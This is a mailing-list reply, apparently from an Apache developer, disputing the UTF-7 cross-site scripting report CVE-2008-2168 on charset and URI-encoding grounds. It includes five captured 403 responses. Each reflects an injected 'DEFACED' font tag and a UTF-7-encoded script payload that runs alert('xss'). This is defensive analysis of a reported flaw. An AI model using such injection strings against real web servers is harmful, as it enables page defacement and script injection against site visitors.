Re: Re: Re: Re: Re: Apache Server HTML Injection and UTF-7 XSS Vulnerability
re: "set 403 page's charset in the server side by writing it in your server
code"
Apache *does* set the charset in the HTTP header. It is set to iso-8859-1 by
default.
Adding a <meta http-equiv> tag with the iso-8859-1 charset does not change the
browser behavior. See below for the captured response from a test with this
change.
The user can still manually override the charset to UTF-7 via the browser menu,
regardless of anything the Apache server sends.
re: "There is no problem to trick the victim and force him to change the
encoding of his browser by little social engineering"
For the Apache 403 error page, the only opportunity to "trick" the victim is
within the URL itself. It would be quite a feat of social engineering to do
this within a URL, between the phrases "You don't have permission to access"
and "on this server".
There are many possible malicious strings in UTF-7, and any sequence of
character values less than 0x80 starting with a "+" is potentially a UTF-7
string. This is why it is not appropriate for browsers to automatically
interpret text as UTF-7. Preventing a user from manually overriding the
specified charset and interpreting strings as UTF-7 is not something a web
server can do. If you feel this manual function should be disabled in browsers,
it may be better to let the browser developers know.
re: percent-encoding the "+" character in URLs
The "+" character is a reserved character in URIs per RFC2396 (see section 2.2
Reserved Characters). RFC3986 goes further and explains why reserved characters
like "+" should not be percent-encoded:
"Percent-encoding a reserved character, or decoding a percent-encoded octet
that corresponds to a reserved character, will change how the URI is
interpreted by most applications. Thus, characters in the reserved
set are protected from normalization and are therefore safe to be
used by scheme-specific and producer-specific algorithms for
delimiting data subcomponents within a URI."
A previous writer has correctly noted that Microsoft recommends just the
opposite: that "+" characters should be percent-encoded.
Below are the responses to your test URL from various versions of Apache
servers on different platforms. Note that the iso-8859-1 charset is specified
by the Content-Type header in all cases. The last example is with Apache 2.2.8
modified to include a <meta http-equiv> tag in the body. The behavior remains
the same in both Firefox or IE with this change.
It is a problem for web server developers when a vulnerability is accepted and
propagated with a description like:
"here is a malicious URL - the victim must perform these manual steps with it -
We leave it to other hackers to upgrade the attack and make it fully automatic."
It is a disappointment that CVE-2008-2168 was accepted so uncritically.
Regards,
-tom-
====================================================================
HTTP/1.1 403 Forbidden
Date: Sun, 18 May 2008 02:25:31 GMT
Server: Apache/2.2.3 (CentOS)
Content-Length: 590
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access
/Znl5g3k70ZaBUPYmN5RAGUdkskoprzGI63K4mIj2sqzbX0Kc3Fu7vfthepWhmKvjudPuJTNeK9zw5MaZ1yXJi8RJRRuPe5UahFwOblMXsIPTGh3pVjTLdim3vuTKgdazOG9idQbIjbnpMEco8Zlo5xNRuCoviPx7x7tYYeOgc8HU46gaecJwnHY7f6GlQB8H6kBFhjoIaHE1SQPhU5VReCz1olPh5jZ<font
size=50>DEFACED<!xc+ADw-script+AD4-alert('xss')+ADw-/script+AD4---//--
on this server.</p>
<hr>
<address>Apache/2.2.3 (CentOS) Server at www.example.com Port 80</address>
</body></html>
====================================================================
HTTP/1.1 403 Forbidden
Date: Sun, 18 May 2008 02:37:17 GMT
Server: Apache/2.2.8 (Win32) mod_ssl/2.2.8 OpenSSL/0.9.8g SVN/1.4.6 DAV/2
mod_perl/2.0.4 Perl/v5.10.0
Content-Length: 510
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access
/Znl5g3k70ZaBUPYmN5RAGUdkskoprzGI63K4mIj2sqzbX0Kc3Fu7vfthepWhmKvjudPuJTNeK9zw5MaZ1yXJi8RJRRuPe5UahFwOblMXsIPTGh3pVjTLdim3vuTKgdazOG9idQbIjbnpMEco8Zlo5xNRuCoviPx7x7tYYeOgc8HU46gaecJwnHY7f6GlQB8H6kBFhjoIaHE1SQPhU5VReCz1olPh5jZ<font
size=50>DEFACED<!xc+ADw-script+AD4-alert('xss')+ADw-/script+AD4---//--
on this server.</p>
</body></html>
====================================================================
HTTP/1.1 403 Forbidden
Date: Sun, 18 May 2008 02:47:29 GMT
Server: Apache/2.2.8 (Debian) DAV/2 SVN/1.4.6 PHP/5.2.5-3 with Suhosin-Patch
mod_python/3.3.1 Python/2.4.5
Content-Length: 666
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access
/Znl5g3k70ZaBUPYmN5RAGUdkskoprzGI63K4mIj2sqzbX0Kc3Fu7vfthepWhmKvjudPuJTNeK9zw5MaZ1yXJi8RJRRuPe5UahFwOblMXsIPTGh3pVjTLdim3vuTKgdazOG9idQbIjbnpMEco8Zlo5xNRuCoviPx7x7tYYeOgc8HU46gaecJwnHY7f6GlQB8H6kBFhjoIaHE1SQPhU5VReCz1olPh5jZ<font
size=50>DEFACED<!xc+ADw-script+AD4-alert('xss')+ADw-/script+AD4---//--
on this server.</p>
<hr>
<address>Apache/2.2.8 (Debian) DAV/2 SVN/1.4.6 PHP/5.2.5-3 with Suhosin-Patch
mod_python/3.3.1 Python/2.4.5 Server at www.victim.com Port 80</address>
</body></html>
====================================================================
HTTP/1.1 403 Forbidden
Date: Sun, 18 May 2008 04:45:49 GMT
Server: Apache/1.3.33 (Unix)
Keep-Alive: timeout=15, max=97
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
23c
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>403 Forbidden</TITLE>
</HEAD><BODY>
<H1>Forbidden</H1>
You don't have permission to access
/Znl5g3k70ZaBUPYmN5RAGUdkskoprzGI63K4mIj2sqzbX0Kc3Fu7vfthepWhmKvjudPuJTNeK9zw5MaZ1yXJi8RJRRuPe5UahFwOblMXsIPTGh3pVjTLdim3vuTKgdazOG9idQbIjbnpMEco8Zlo5xNRuCoviPx7x7tYYeOgc8HU46gaecJwnHY7f6GlQB8H6kBFhjoIaHE1SQPhU5VReCz1olPh5jZ<font
size=50>DEFACED<!xc+ADw-script+AD4-alert('xss')+ADw-/script+AD4---//--
on this server.<P>
<HR>
<ADDRESS>Apache/1.3.33 Server at localhost Port 80</ADDRESS>
</BODY></HTML>
0
====================================================================
HTTP/1.1 403 Forbidden
Date: Sun, 18 May 2008 02:53:10 GMT
Server: Apache/2.2.8 (Win32) mod_ssl/2.2.8 OpenSSL/0.9.8g SVN/1.4.6 DAV/2
mod_perl/2.0.4 Perl/v5.10.0
Content-Length: 583
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access
/Znl5g3k70ZaBUPYmN5RAGUdkskoprzGI63K4mIj2sqzbX0Kc3Fu7vfthepWhmKvjudPuJTNeK9zw5MaZ1yXJi8RJRRuPe5UahFwOblMXsIPTGh3pVjTLdim3vuTKgdazOG9idQbIjbnpMEco8Zlo5xNRuCoviPx7x7tYYeOgc8HU46gaecJwnHY7f6GlQB8H6kBFhjoIaHE1SQPhU5VReCz1olPh5jZ<font
size=50>DEFACED<!xc+ADw-script+AD4-alert('xss')+ADw-/script+AD4---//--
on this server.</p>
</body></html>